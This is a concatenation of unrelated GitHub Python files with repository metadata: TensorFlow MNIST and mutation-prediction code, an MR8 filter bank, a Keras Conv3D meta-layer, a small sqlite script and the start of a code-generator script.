] | 2957308424@qq.com |
ceedc1bc32ee20e37272738dadc016703a5e4cf7 | 7e66af5e484f73de3f237a17d8fa42a8af947b22 | /6_2/mnist_backward.py | 51c7f8cbc384c83f08f7b3a023dc5e2181e7a072 | [] | no_license | yuangezhizao/Tensorflow-Study | 12107c6ef8f058123d590a3a7044a6215c4ab457 | 1316922eec2a99cd13317d83553e0a5f279dcbee | refs/heads/master | 2020-05-01T03:03:37.077435 | 2019-03-24T09:45:00 | 2019-03-24T09:45:00 | 177,236,402 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,083 | py | #!/usr/bin/env/ python3
# -*- coding: utf-8 -*-
"""
:Author: yuangezhizao
:Time: 2019/3/24 0024 11:19
:Site: https://www.yuangezhizao.cn
:Copyright: © 2019 yuangezhizao <root@yuangezhizao.cn>
"""
import os
import mnist_forward
import mnist_generateds # 1
import tensorflow as tf
BATCH_SIZE = 200
LEARNING_RATE_BASE = 0.1
LEARNING_RATE_DECAY = 0.99
REGULARIZER = 0.0001
STEPS = 50000
MOVING_AVERAGE_DECAY = 0.99
MODEL_SAVE_PATH = './model/'
MODEL_NAME = 'mnist_model'
train_num_examples = 60000 # 2
def backward():
x = tf.placeholder(tf.float32, [None, mnist_forward.INPUT_NODE])
y_ = tf.placeholder(tf.float32, [None, mnist_forward.OUTPUT_NODE])
y = mnist_forward.forward(x, REGULARIZER)
global_step = tf.Variable(0, trainable=False)
ce = tf.nn.sparse_softmax_cross_entropy_with_logits(logits=y, labels=tf.argmax(y_, 1))
cem = tf.reduce_mean(ce)
loss = cem + tf.add_n(tf.get_collection('losses'))
learning_rate = tf.train.exponential_decay(
LEARNING_RATE_BASE,
global_step,
train_num_examples / BATCH_SIZE,
LEARNING_RATE_DECAY,
staircase=True)
train_step = tf.train.GradientDescentOptimizer(learning_rate).minimize(loss, global_step=global_step)
ema = tf.train.ExponentialMovingAverage(MOVING_AVERAGE_DECAY, global_step)
ema_op = ema.apply(tf.trainable_variables())
with tf.control_dependencies([train_step, ema_op]):
train_op = tf.no_op(name='train')
saver = tf.train.Saver()
img_batch, label_batch = mnist_generateds.get_tfrecord(BATCH_SIZE, isTrain=True) # 3
with tf.Session() as sess:
init_op = tf.global_variables_initializer()
sess.run(init_op)
ckpt = tf.train.get_checkpoint_state(MODEL_SAVE_PATH)
if ckpt and ckpt.model_checkpoint_path:
saver.restore(sess, ckpt.model_checkpoint_path)
coord = tf.train.Coordinator() # 4
threads = tf.train.start_queue_runners(sess=sess, coord=coord) # 5
for i in range(STEPS):
xs, ys = sess.run([img_batch, label_batch]) # 6
_, loss_value, step = sess.run([train_op, loss, global_step], feed_dict={x: xs, y_: ys})
if i % 1000 == 0:
print('After %d training step(s), loss on training batch is %g.' % (step, loss_value))
saver.save(sess, os.path.join(MODEL_SAVE_PATH, MODEL_NAME), global_step=global_step)
coord.request_stop() # 7
coord.join(threads) # 8
def main():
backward() # 9
if __name__ == '__main__':
main()
'''
C:\Python37\python.exe D:/yuangezhizao/Documents/PycharmProjects/Tensorflow-Study/6_2/mnist_backward.py
WARNING:tensorflow:From C:\Python37\lib\site-packages\tensorflow\python\framework\op_def_library.py:263: colocate_with (from tensorflow.python.framework.ops) is deprecated and will be removed in a future version.
Instructions for updating:
Colocations handled automatically by placer.
WARNING:tensorflow:From D:\yuangezhizao\Documents\PycharmProjects\Tensorflow-Study\6_2\mnist_generateds.py:62: string_input_producer (from tensorflow.python.training.input) is deprecated and will be removed in a future version.
Instructions for updating:
Queue-based input pipelines have been replaced by `tf.data`. Use `tf.data.Dataset.from_tensor_slices(string_tensor).shuffle(tf.shape(input_tensor, out_type=tf.int64)[0]).repeat(num_epochs)`. If `shuffle=False`, omit the `.shuffle(...)`.
WARNING:tensorflow:From C:\Python37\lib\site-packages\tensorflow\python\training\input.py:278: input_producer (from tensorflow.python.training.input) is deprecated and will be removed in a future version.
Instructions for updating:
Queue-based input pipelines have been replaced by `tf.data`. Use `tf.data.Dataset.from_tensor_slices(input_tensor).shuffle(tf.shape(input_tensor, out_type=tf.int64)[0]).repeat(num_epochs)`. If `shuffle=False`, omit the `.shuffle(...)`.
WARNING:tensorflow:From C:\Python37\lib\site-packages\tensorflow\python\training\input.py:190: limit_epochs (from tensorflow.python.training.input) is deprecated and will be removed in a future version.
Instructions for updating:
Queue-based input pipelines have been replaced by `tf.data`. Use `tf.data.Dataset.from_tensors(tensor).repeat(num_epochs)`.
WARNING:tensorflow:From C:\Python37\lib\site-packages\tensorflow\python\training\input.py:199: QueueRunner.__init__ (from tensorflow.python.training.queue_runner_impl) is deprecated and will be removed in a future version.
Instructions for updating:
To construct input pipelines, use the `tf.data` module.
WARNING:tensorflow:From C:\Python37\lib\site-packages\tensorflow\python\training\input.py:199: add_queue_runner (from tensorflow.python.training.queue_runner_impl) is deprecated and will be removed in a future version.
Instructions for updating:
To construct input pipelines, use the `tf.data` module.
WARNING:tensorflow:From C:\Python37\lib\site-packages\tensorflow\python\training\input.py:202: to_float (from tensorflow.python.ops.math_ops) is deprecated and will be removed in a future version.
Instructions for updating:
Use tf.cast instead.
WARNING:tensorflow:From D:\yuangezhizao\Documents\PycharmProjects\Tensorflow-Study\6_2\mnist_generateds.py:63: TFRecordReader.__init__ (from tensorflow.python.ops.io_ops) is deprecated and will be removed in a future version.
Instructions for updating:
Queue-based input pipelines have been replaced by `tf.data`. Use `tf.data.TFRecordDataset`.
WARNING:tensorflow:From D:\yuangezhizao\Documents\PycharmProjects\Tensorflow-Study\6_2\mnist_generateds.py:87: shuffle_batch (from tensorflow.python.training.input) is deprecated and will be removed in a future version.
Instructions for updating:
Queue-based input pipelines have been replaced by `tf.data`. Use `tf.data.Dataset.shuffle(min_after_dequeue).batch(batch_size)`.
2019-03-24 11:36:34.346111: I tensorflow/core/platform/cpu_feature_guard.cc:141] Your CPU supports instructions that this TensorFlow binary was not compiled to use: AVX2
2019-03-24 11:36:35.103492: I tensorflow/core/common_runtime/gpu/gpu_device.cc:1433] Found device 0 with properties:
name: GeForce GTX 965M major: 5 minor: 2 memoryClockRate(GHz): 0.9495
pciBusID: 0000:01:00.0
totalMemory: 2.00GiB freeMemory: 1.63GiB
2019-03-24 11:36:35.109244: I tensorflow/core/common_runtime/gpu/gpu_device.cc:1512] Adding visible gpu devices: 0
2019-03-24 11:36:35.669899: I tensorflow/core/common_runtime/gpu/gpu_device.cc:984] Device interconnect StreamExecutor with strength 1 edge matrix:
2019-03-24 11:36:35.673115: I tensorflow/core/common_runtime/gpu/gpu_device.cc:990] 0
2019-03-24 11:36:35.675092: I tensorflow/core/common_runtime/gpu/gpu_device.cc:1003] 0: N
2019-03-24 11:36:35.677888: I tensorflow/core/common_runtime/gpu/gpu_device.cc:1115] Created TensorFlow device (/job:localhost/replica:0/task:0/device:GPU:0 with 1372 MB memory) -> physical GPU (device: 0, name: GeForce GTX 965M, pci bus id: 0000:01:00.0, compute capability: 5.2)
WARNING:tensorflow:From D:/yuangezhizao/Documents/PycharmProjects/Tensorflow-Study/6_2/mnist_backward.py:62: start_queue_runners (from tensorflow.python.training.queue_runner_impl) is deprecated and will be removed in a future version.
Instructions for updating:
To construct input pipelines, use the `tf.data` module.
2019-03-24 11:36:36.371376: I tensorflow/stream_executor/dso_loader.cc:152] successfully opened CUDA library cublas64_100.dll locally
After 1 training step(s), loss on training batch is 2.24236.
After 1001 training step(s), loss on training batch is 0.220115.
After 2001 training step(s), loss on training batch is 0.152076.
After 3001 training step(s), loss on training batch is 0.205216.
After 4001 training step(s), loss on training batch is 0.167567.
After 5001 training step(s), loss on training batch is 0.158635.
WARNING:tensorflow:From C:\Python37\lib\site-packages\tensorflow\python\training\saver.py:966: remove_checkpoint (from tensorflow.python.training.checkpoint_management) is deprecated and will be removed in a future version.
Instructions for updating:
Use standard file APIs to delete files with this prefix.
After 6001 training step(s), loss on training batch is 0.210692.
After 7001 training step(s), loss on training batch is 0.171899.
After 8001 training step(s), loss on training batch is 0.158845.
After 9001 training step(s), loss on training batch is 0.196471.
After 10001 training step(s), loss on training batch is 0.180448.
After 11001 training step(s), loss on training batch is 0.14437.
After 12001 training step(s), loss on training batch is 0.178022.
After 13001 training step(s), loss on training batch is 0.185863.
After 14001 training step(s), loss on training batch is 0.138782.
After 15001 training step(s), loss on training batch is 0.191732.
After 16001 training step(s), loss on training batch is 0.168763.
After 17001 training step(s), loss on training batch is 0.141043.
After 18001 training step(s), loss on training batch is 0.159804.
After 19001 training step(s), loss on training batch is 0.149362.
After 20001 training step(s), loss on training batch is 0.130862.
After 21001 training step(s), loss on training batch is 0.160967.
After 22001 training step(s), loss on training batch is 0.159692.
After 23001 training step(s), loss on training batch is 0.139557.
After 24001 training step(s), loss on training batch is 0.153192.
After 25001 training step(s), loss on training batch is 0.159082.
After 26001 training step(s), loss on training batch is 0.135244.
After 27001 training step(s), loss on training batch is 0.165513.
After 28001 training step(s), loss on training batch is 0.162942.
After 29001 training step(s), loss on training batch is 0.142064.
After 30001 training step(s), loss on training batch is 0.155545.
After 31001 training step(s), loss on training batch is 0.13796.
After 32001 training step(s), loss on training batch is 0.125994.
After 33001 training step(s), loss on training batch is 0.140172.
After 34001 training step(s), loss on training batch is 0.143543.
After 35001 training step(s), loss on training batch is 0.122421.
After 36001 training step(s), loss on training batch is 0.143754.
After 37001 training step(s), loss on training batch is 0.173271.
After 38001 training step(s), loss on training batch is 0.133238.
After 39001 training step(s), loss on training batch is 0.130665.
After 40001 training step(s), loss on training batch is 0.134306.
After 41001 training step(s), loss on training batch is 0.135702.
After 42001 training step(s), loss on training batch is 0.126434.
After 43001 training step(s), loss on training batch is 0.155796.
After 44001 training step(s), loss on training batch is 0.124808.
After 45001 training step(s), loss on training batch is 0.131072.
After 46001 training step(s), loss on training batch is 0.135592.
After 47001 training step(s), loss on training batch is 0.117375.
After 48001 training step(s), loss on training batch is 0.120023.
After 49001 training step(s), loss on training batch is 0.15125.
Process finished with exit code 0
'''
| [
"root@yuangezhizao.cn"
] | root@yuangezhizao.cn |
a401716579994e1c9f7e98b968725c0421e3183f | 2e072e0ebc25dda2548a097e3ed70ea378b7b3c5 | /models/primitives.py | fec84fc69b48c939e4246953fab00b4a96e84088 | [] | no_license | YuliaRubanova/mutation_prediction | 5f6341b14f8968de8b43d9fdd936de20136962f2 | d7e7348d21c33fa7273897ece030fe8323cc3740 | refs/heads/master | 2021-05-08T06:29:53.728118 | 2018-03-03T21:06:59 | 2018-03-03T21:06:59 | 106,626,293 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,780 | py | import tensorflow as tf
import tempfile
import numpy as np
def deepnn(x):
"""deepnn builds the graph for a deep net for classifying digits.
Args:
x: an input tensor with the dimensions (N_examples, 784), where 784 is the
number of pixels in a standard MNIST image.
Returns:
A tuple (y, keep_prob). y is a tensor of shape (N_examples, 10), with values
equal to the logits of classifying the digit into one of 10 classes (the
digits 0-9). keep_prob is a scalar placeholder for the probability of
dropout.
"""
# Reshape to use within a convolutional neural net.
# Last dimension is for "features" - there is only one here, since images are
# grayscale -- it would be 3 for an RGB image, 4 for RGBA, etc.
with tf.name_scope('reshape'):
x_image = tf.reshape(x, [-1, 344, 9, 1])
# First convolutional layer - maps one grayscale image to 32 feature maps.
with tf.name_scope('conv1'):
W_conv1 = weight_variable([5, 5, 1, 32])
b_conv1 = bias_variable([32])
h_conv1 = tf.nn.relu(conv2d(x_image, W_conv1) + b_conv1)
# Pooling layer - downsamples by 2X.
with tf.name_scope('pool1'):
h_pool1 = max_pool_2x2(h_conv1)
# Second convolutional layer -- maps 32 feature maps to 64.
with tf.name_scope('conv2'):
W_conv2 = weight_variable([5, 5, 32, 64])
b_conv2 = bias_variable([64])
h_conv2 = tf.nn.relu(conv2d(h_pool1, W_conv2) + b_conv2)
# Second pooling layer.
with tf.name_scope('pool2'):
h_pool2 = max_pool_2x2(h_conv2)
# Fully connected layer 1 -- after 2 round of downsampling, our 28x28 image
# is down to 7x7x64 feature maps -- maps this to 1024 features.
with tf.name_scope('fc1'):
W_fc1 = weight_variable([16512, 1024])
b_fc1 = bias_variable([1024])
h_pool2_flat = tf.reshape(h_pool2, [-1, 16512])
h_fc1 = tf.nn.relu(tf.matmul(h_pool2_flat, W_fc1) + b_fc1)
# Dropout - controls the complexity of the model, prevents co-adaptation of
# features.
with tf.name_scope('dropout'):
keep_prob = tf.placeholder(tf.float32)
h_fc1_drop = tf.nn.dropout(h_fc1, keep_prob)
# Map the 1024 features to 10 classes, one for each digit
with tf.name_scope('fc2'):
W_fc2 = weight_variable([1024, 1])
b_fc2 = bias_variable([1])
y_conv = tf.matmul(h_fc1_drop, W_fc2) + b_fc2
return y_conv, keep_prob
def conv2d(x, W):
"""conv2d returns a 2d convolution layer with full stride."""
return tf.nn.conv2d(x, W, strides=[1, 1, 1, 1], padding='SAME')
def max_pool_2x2(x):
"""max_pool_2x2 downsamples a feature map by 2X."""
return tf.nn.max_pool(x, ksize=[1, 2, 2, 1],
strides=[1, 2, 2, 1], padding='SAME')
def weight_variable(shape, mean = 0.0, stddev=0.1):
"""weight_variable generates a weight variable of a given shape."""
initial = tf.truncated_normal(shape, mean = mean, stddev=stddev)
return tf.Variable(initial)
def bias_variable(shape, value=0.1):
"""bias_variable generates a bias variable of a given shape."""
initial = tf.constant(value, shape=shape)
return tf.Variable(initial)
def unpack_gaussian(x, dim):
return x[:,:dim], x[:,dim:]
def get_batch(data_list, batch_size, i):
return [data[i*batch_size:(i+1)*batch_size] for data in data_list]
def save_graph():
graph_location = tempfile.mkdtemp()
print('Saving graph to: %s' % graph_location)
train_writer = tf.summary.FileWriter(graph_location)
train_writer.add_graph(tf.get_default_graph())
def init_neural_net_params(layer_sizes, stddev = 0.1, bias = 0.1):
"""Build a list of (weights, biases) tuples,
one for each layer in the net."""
weights = []
biases = []
for i, (m, n) in enumerate(list(zip(layer_sizes[:-1], layer_sizes[1:]))):
print((m,n))
weights.append(weight_variable([m, n], stddev = stddev))
biases.append(bias_variable([n], value = bias))
return {'weights': weights, 'biases': biases}
def neural_net(data, weights, biases):
x = data
for w,b in list(zip(weights, biases))[:-1]:
x = tf.nn.relu(tf.matmul(x, w) + b)
#x = tf.tanh(tf.matmul(x, w) + b)
output = tf.matmul(x, weights[-1]) + biases[-1]
return output
def correct_predictions(predictions, y_):
predictions_binary = tf.cast(tf.less(tf.constant(0.5), predictions),tf.int64) # gaussian
correct_prediction = tf.equal(predictions_binary, tf.cast(y_,tf.int64))
correct_prediction = tf.cast(correct_prediction, tf.float32)
return correct_prediction
def correct_predictions_multiclass(predictions, y_):
correct_prediction = tf.equal(tf.argmax(predictions, axis=1), tf.argmax(y_, axis=1))
correct_prediction = tf.cast(correct_prediction, tf.float32)
return correct_prediction
def mean_squared_error(truth, predicted):
return tf.sqrt(tf.reduce_mean(tf.square(truth - predicted)))
def evaluate_on_each_tumour(x_data, tumours_data, time_estimates_data, tf_vars, metric):
x, tumour_id, time_estimates, time_series_lengths, sequences_per_batch_tf, predictions = tf_vars
evaluated_metric = 0
n_tumour_batches = x_data.shape[0]
for tumour_data, tid, time in zip(x_data, tumours_data, time_estimates_data):
tumour_dict = {x: tumour_data, tumour_id: np.array(tid).astype(int)[:,np.newaxis],
time_estimates: time,
time_series_lengths: np.squeeze(np.apply_along_axis(sum, 1, time_estimates_data > 0), axis=0),
sequences_per_batch_tf: tumour_data.shape[1]}
evaluated_metric += metric.eval(feed_dict=tumour_dict) / n_tumour_batches
return evaluated_metric
def collect_on_each_tumour(x_data, tumours_data, time_estimates_data, tf_vars, metric):
x, tumour_id, time_estimates, time_series_lengths, sequences_per_batch_tf, predictions = tf_vars
evaluated_metric = []
n_tumour_batches = x_data.shape[0]
for tumour_data, tid, time in zip(x_data, tumours_data, time_estimates_data):
tumour_dict = {x: tumour_data, tumour_id: np.array(tid).astype(int)[:,np.newaxis],
time_estimates: time,
time_series_lengths: np.squeeze(np.apply_along_axis(sum, 1, time_estimates_data > 0), axis=0),
sequences_per_batch_tf: tumour_data.shape[1]}
evaluated_metric.append(metric.eval(feed_dict=tumour_dict))
return evaluated_metric
def compute_mut_type_prob(truth, n_mut_types, predicted_mut_types, vaf=None, time_series_lengths=None):
mut_types = tf.transpose(truth[:,:,:n_mut_types], perm = [1,0,2])
dist = tf.contrib.distributions.Multinomial(total_count=tf.reduce_sum(mut_types,axis=2), logits=predicted_mut_types, validate_args = True)
type_prob = tf.expand_dims(dist.log_prob(mut_types), 1)
if vaf is not None:
type_prob = tf.multiply(type_prob, tf.to_float(tf.greater((vaf),tf.constant(0.0))))
type_prob = tf.divide(type_prob, (time_series_lengths - 1))
return type_prob
def kl_divergence(p,q):
kl = p * tf.log( p / q)
return kl
| [
"julia_erise@mail.ru"
] | julia_erise@mail.ru |
3e5bb2da81c38b22767d8afd2e83e828dff49772 | 8ba33fabe2760b66256a0ae66e3983b83dc63a4d | /mr8.py | e4700d4f9bf00ff217e26effecd23fa09fea311f | [
"MIT"
] | permissive | AdilBaaj/Fisher-Vectors | a06eea868aac87af0ffd34f6bd7b2337b333b684 | b948c220896e438e34d68d29f5e38fd7bb28290e | refs/heads/master | 2021-05-05T00:58:34.553875 | 2016-08-09T11:10:06 | 2016-08-09T11:10:06 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,613 | py | #!/usr/bin/env python
'''
Utility to generate MR8 Filter Bank
'''
__author='Ameya Joshi'
__email = 'ameya@sigtuple.com'
from skimage import filters
import numpy as np
import scipy as sp
from matplotlib import pyplot as plt
import pickle as pkl
import numpy as np
import matplotlib.pyplot as plt
from itertools import product, chain
from scipy.misc import face
#from sklearn.externals.joblib import Parallel, delayed
class MR8_FilterBank():
def __init__(sigma=[1,2,4], n_orienatations=6):
return
def make_gaussian_filter(self, x, sigma, order=0):
if order > 2:
raise ValueError("Only orders up to 2 are supported")
# compute unnormalized Gaussian response
response = np.exp(-x ** 2 / (2. * sigma ** 2))
if order == 1:
response = -response * x
elif order == 2:
response = response * (x ** 2 - sigma ** 2)
# normalize
response /= np.abs(response).sum()
return response
def makefilter(self, scale, phasey, pts, sup):
gx = self.make_gaussian_filter(pts[0, :], sigma=3 * scale)
gy = self.make_gaussian_filter(pts[1, :], sigma=scale, order=phasey)
f = (gx * gy).reshape(sup, sup)
# normalize
f /= np.abs(f).sum()
return f
def makeRFSfilters(self, radius=24, sigmas=[1, 2, 4], n_orientations=6):
""" Generates filters for RFS filterbank.
Parameters
----------
radius : int, default 28
radius of all filters. Size will be 2 * radius + 1
sigmas : list of floats, default [1, 2, 4]
define scales on which the filters will be computed
n_orientations : int
number of fractions the half-angle will be divided in
Returns
-------
edge : ndarray (len(sigmas), n_orientations, 2*radius+1, 2*radius+1)
Contains edge filters on different scales and orientations
bar : ndarray (len(sigmas), n_orientations, 2*radius+1, 2*radius+1)
Contains bar filters on different scales and orientations
rot : ndarray (2, 2*radius+1, 2*radius+1)
contains two rotation invariant filters, Gaussian and Laplacian of
Gaussian
"""
support = 2 * radius + 1
x, y = np.mgrid[-radius:radius + 1, radius:-radius - 1:-1]
orgpts = np.vstack([x.ravel(), y.ravel()])
rot, edge, bar = [], [], []
for sigma in sigmas:
for orient in xrange(n_orientations):
# Not 2pi as filters have symmetry
angle = np.pi * orient / n_orientations
c, s = np.cos(angle), np.sin(angle)
rotpts = np.dot(np.array([[c, -s], [s, c]]), orgpts)
edge.append(self.makefilter(sigma, 1, rotpts, support))
bar.append(self.makefilter(sigma, 2, rotpts, support))
length = np.sqrt(x ** 2 + y ** 2)
rot.append(self.make_gaussian_filter(length, sigma=10))
rot.append(self.make_gaussian_filter(length, sigma=10, order=2))
# reshape rot and edge
edge = np.asarray(edge)
edge = edge.reshape(len(sigmas), n_orientations, support, support)
#print 'edge shape',edge.shape
bar = np.asarray(bar).reshape(edge.shape)
#print 'bar shape',bar.shape
rot = np.asarray(rot)[:, np.newaxis, :, :]
#print rot.shape
return edge, bar, rot
def apply_filterbank(self, img, filterbank):
from scipy.ndimage import convolve
result = []
#print img
for battery in filterbank:
#print 'Hi'
#print len(battery), battery[0].shape
response = [convolve(img, filt, mode='reflect') for filt in battery]
#response = Parallel(n_jobs=5)(
#delayed(convolve)(img, filt) for filt in battery)
#print len(response)
max_response = np.max(response, axis=0)
result.append(max_response)
print("battery finished")
#print len(result)
return result
if __name__ == "__main__":
sigmas = [1, 2, 4]
n_sigmas = len(sigmas)
n_orientations = 6
mr8 = MR8_FilterBank()
edge, bar, rot = mr8.makeRFSfilters(sigmas=sigmas,
n_orientations=n_orientations)
n = n_sigmas * n_orientations
# plot filters
# 2 is for bar / edge, + 1 for rot
fig, ax = plt.subplots(n_sigmas * 2 + 1, n_orientations)
for k, filters in enumerate([bar, edge]):
for i, j in product(xrange(n_sigmas), xrange(n_orientations)):
row = i + k * n_sigmas
ax[row, j].imshow(filters[i, j, :, :], cmap=plt.cm.gray)
ax[row, j].set_xticks(())
ax[row, j].set_yticks(())
ax[-1, 0].imshow(rot[0, 0], cmap=plt.cm.gray)
ax[-1, 0].set_xticks(())
ax[-1, 0].set_yticks(())
ax[-1, 1].imshow(rot[1, 0], cmap=plt.cm.gray)
ax[-1, 1].set_xticks(())
ax[-1, 1].set_yticks(())
for i in xrange(2, n_orientations):
ax[-1, i].set_visible(False)
# apply filters to lena
img = face(gray=True).astype(np.float)
print(img.shape)
filterbank = chain(edge, bar, rot)
n_filters = len(edge) + len(bar) + len(rot)
print('[applying]:%d'%n_filters)
response = mr8.apply_filterbank(img, filterbank)
# plot responses
fig2, ax2 = plt.subplots(3, 3)
for axes, res in zip(ax2.ravel(), response):
axes.imshow(res, cmap=plt.cm.gray)
axes.set_xticks(())
axes.set_yticks(())
ax2[-1, -1].set_visible(False)
plt.show()
| [
"ameya@sigtuple.com"
] | ameya@sigtuple.com |
74ddb7055e05ca9419e736b7f3c2b526625a7f53 | a03b076528ef50b95e906b32097865de607a4578 | /automate3.py | b411b61930652edebec100ee181635b0a0091e53 | [] | no_license | Hiroaki0422/WebScraper-db | 7dc306d6adaad035993375e6457af993f5b1051e | 0bd470c4c156627205bd834cd96c3008dfc1c466 | refs/heads/master | 2020-04-07T06:36:04.416831 | 2018-11-19T01:13:41 | 2018-11-19T01:13:41 | 158,142,675 | 0 | 0 | null | 2018-11-19T00:57:08 | 2018-11-19T00:57:08 | null | UTF-8 | Python | false | false | 325 | py | import sqlite3
conn = sqlite3.connect('automa_job.db')
mydb = conn.cursor()
mydb.execute(''' CREATE TABLE jobs
(title text, company text, link text, term text)''')
mydb.execute("INSERT INTO jobs VALUES ('semi-professional waffle cosplayer','Office of Carol Christ','pornhub.com','20XX-20YY')")
conn.commit()
conn.close() | [
"kifa0422@gmail.com"
] | kifa0422@gmail.com |
dff0eb2acf4da0a475156ff795a327f9c89bcde3 | a5ada23f0c9d429cd7afa2351368e46bc23255e4 | /meta_models/meta_layers/conv3d_meta_layer.py | b3542d2d43a0dafcd10873c1e253f60dafba31d8 | [
"MIT"
] | permissive | AnacletoLAB/meta_models | ef6df0205f88832897e7ebdcd8057635b90024a9 | 9c70eb0bf080f0ec4bd24b7764f0f71d92d467d5 | refs/heads/master | 2023-04-11T14:01:47.678710 | 2021-04-27T08:25:53 | 2021-04-27T08:25:53 | 286,005,232 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,515 | py | """Class implementing meta-model for a Conv3D Layer."""
from typing import Dict
from tensorflow.keras.layers import (Activation, BatchNormalization, Conv3D,
Layer)
from .regularized_meta_layer import RegularizedMetaLayer
from ..utils import distributions
class Conv3DMetaLayer(RegularizedMetaLayer):
"""Class implementing meta-layer for tri-dimensional convolutional layers.
Private members
------------------------
_min_filters: int,
Minimum number of filters to use for the layer.
_max_filters: int,
Maximum number of filters to use for the layer.
_min_x_kernel_size: int,
Minimum size of the kernel on the lenght axis.
_max_x_kernel_size: int,
Maximum size of the kernel on the lenght axis.
_min_y_kernel_size: int,
Minimum size of the kernel on the depth axis.
_max_y_kernel_size: int,
Maximum size of the kernel on the depth axis.
_min_z_kernel_size: int,
Minimum size of the kernel on the height axis.
_max_z_kernel_size: int,
Maximum size of the kernel on the height axis.
_activation: str,
The activation function to use for the layer.
"""
def __init__(
self,
min_filters: int = 0,
max_filters: int = 256,
min_x_kernel_size: int = 1,
max_x_kernel_size: int = 5,
min_y_kernel_size: int = 1,
max_y_kernel_size: int = 5,
min_z_kernel_size: int = 1,
max_z_kernel_size: int = 5,
activation: str = "relu",
**kwargs: Dict
):
"""Create new Conv3DResidualLayer meta-model object.
Parameters
----------------------
min_filters: int = 0,
Minimum number of filters (neurons) in each layer.
If the tuning process passes 0, then the layer is skipped.
max_filters: int = 256,
Maximum number of filters (neurons) in each layer.
min_x_kernel_size: int = 1,
Minimum size of the kernel on the lenght axis.
max_x_kernel_size: int = 5,
Maximum size of the kernel on the lenght axis.
min_y_kernel_size: int = 1,
Minimum size of the kernel on the depth axis.
max_y_kernel_size: int = 5,
Maximum size of the kernel on the depth axis.
min_z_kernel_size: int = 1,
Minimum size of the kernel on the height axis.
max_z_kernel_size: int = 5,
Maximum size of the kernel on the height axis.
activation: str = "relu",
The activation function to use for the layer.
**kwargs: Dict,
Dictionary of keyword parameters to be passed to parent class.
"""
super().__init__(**kwargs)
self._min_filters = min_filters
self._max_filters = max_filters
self._min_x_kernel_size = min_x_kernel_size
self._max_x_kernel_size = max_x_kernel_size
self._min_y_kernel_size = min_y_kernel_size
self._max_y_kernel_size = max_y_kernel_size
self._min_z_kernel_size = min_z_kernel_size
self._max_z_kernel_size = max_z_kernel_size
self._activation = activation
def _space(self) -> Dict:
"""Return hyper parameters of the layer."""
return {
"filters": (distributions.integer, self._min_filters, self._max_filters),
"x_kernel_size": (distributions.integer, self._min_x_kernel_size, self._max_x_kernel_size),
"y_kernel_size": (distributions.integer, self._min_y_kernel_size, self._max_y_kernel_size),
"z_kernel_size": (distributions.integer, self._min_z_kernel_size, self._max_z_kernel_size),
**super()._space()
}
def _build(
self,
input_layers: Layer,
filters: int,
x_kernel_size: int,
y_kernel_size: int,
z_kernel_size: int,
strides: int = (1, 1, 1),
**kwargs: Dict
) -> Layer:
"""Return built Conv3D layer block.
If the given filters number is equal to 0, the layer is skipped.
Parameters
--------------------------
input_layers: Layer,
The input layer of the current layer.
filters: int,
The number of neurons of the layer.
x_kernel_size: int,
The dimension of the kernel for the layer, on the length axis.
y_kernel_size: int,
The dimension of the kernel for the layer, on the depth axis.
z_kernel_size: int,
The dimension of the kernel for the layer, on the height axis.
strides: int = (1, 1),
Strides for the convolutional layer.
**kwargs: Dict,
The kwargs to pass to the kernel regularizers.
Returns
--------------------------
Output layer of the block.
"""
filters = round(filters)
x_kernel_size = round(x_kernel_size)
y_kernel_size = round(y_kernel_size)
z_kernel_size = round(z_kernel_size)
if filters == 0:
return input_layers
layer = Conv3D(
filters=filters,
kernel_size=(x_kernel_size, y_kernel_size, z_kernel_size),
strides=strides,
padding="same",
**self._build_regularizers(**kwargs)
)(input_layers)
if self._batch_normalization:
layer = BatchNormalization()(layer)
activation = Activation(self._activation)(layer)
return activation
| [
"cappelletti.luca94@gmail.com"
] | cappelletti.luca94@gmail.com |
b4fb01470f103a8299e89e3f93c3972b0997a026 | e04d618fa665dfadadb221a6803dd3531b08145c | /bot.py | f87458a69d7639c626bdc9f4bddb1d60131bb424 | [] | no_license | vivonk/assesment-submission | 321d63ff01f4d41850eafdc37a715b0f72440487 | 038f8181573bff126102c522d670c3fdb70e8bc1 | refs/heads/master | 2020-04-02T01:39:20.096184 | 2018-10-20T20:13:41 | 2018-10-20T20:13:41 | 153,867,822 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,883 | py | import json
import sys
# global file syntax
function_def_head = '\ndef '
bracket_without_params = '():'
for_base_syntax = 'for i in range('
def input_formatter(input_text):
return 'raw_input(\"' + input_text + '\")'
def generate_for_loop(print_obj, list_len):
for_loop = for_base_syntax
for_loop += list_len + '):' + double_new_line()
for_loop += print_something(print_obj, False) + new_line()
return for_loop
def generate_for_loop_with_format(print_obj, var, list_len):
for_loop = for_base_syntax
for_loop += list_len + '):' + double_new_line()
for_loop += print_something_with_format(print_obj, var, False)
return for_loop
def print_something(print_obj, is_list_length, list_len=0):
if is_list_length and list_len > 0:
return generate_for_loop(print_obj, list_len)
else:
return 'print(\"' + print_obj + '\")'
def print_something_with_format(print_obj, var, is_list_length, list_len=0):
if is_list_length and list_len > 0:
return generate_for_loop_with_format(print_obj, var, list_len)
else:
base_string = '\"' + print_obj + '\" % ('
size = len(var)
for i in range(size - 1):
base_string += var[i] + ', '
base_string += var[size - 1] + ')'
return 'print( ' + base_string + ' )'
def get_input_writer(var, msg):
return var + ' = ' + input_formatter(msg)
def get_input_writer_with_option(var, msg, options):
size = len(options)
option_string = '( '
for i in range(0, size - 1):
option_string += options[i] + '/'
option_string += options[size - 1] + ' )'
return var + ' = ' + input_formatter(msg + option_string)
def new_line():
return '\n\t'
def double_new_line():
return '\n\t\t'
def write_conditions(var, msg, conditions):
final_condition_statement = 'while '
size_1 = len(conditions)
for i in range(0, size_1 - 1): # or condition
final_condition_statement += '( '
size_2 = len(conditions[i])
for j in range(0, size_2 - 1): # and condition
final_condition_statement += '( ' + conditions[i][j] + ' )' + ' and '
final_condition_statement += '( ' + conditions[i][size_2 - 1] + ' )'
final_condition_statement += ' ) or'
final_condition_statement += '( '
size_2 = len(conditions[size_1 - 1])
for j in range(0, size_2 - 1): # and condition
final_condition_statement += '( ' + conditions[size_1 - 1][j] + ' )' + ' and '
final_condition_statement += '( ' + conditions[size_1 - 1][size_2 - 1] + ' )'
final_condition_statement += ' )'
final_condition_statement += ':' + double_new_line()
final_condition_statement += get_input_writer(var, msg) + new_line()
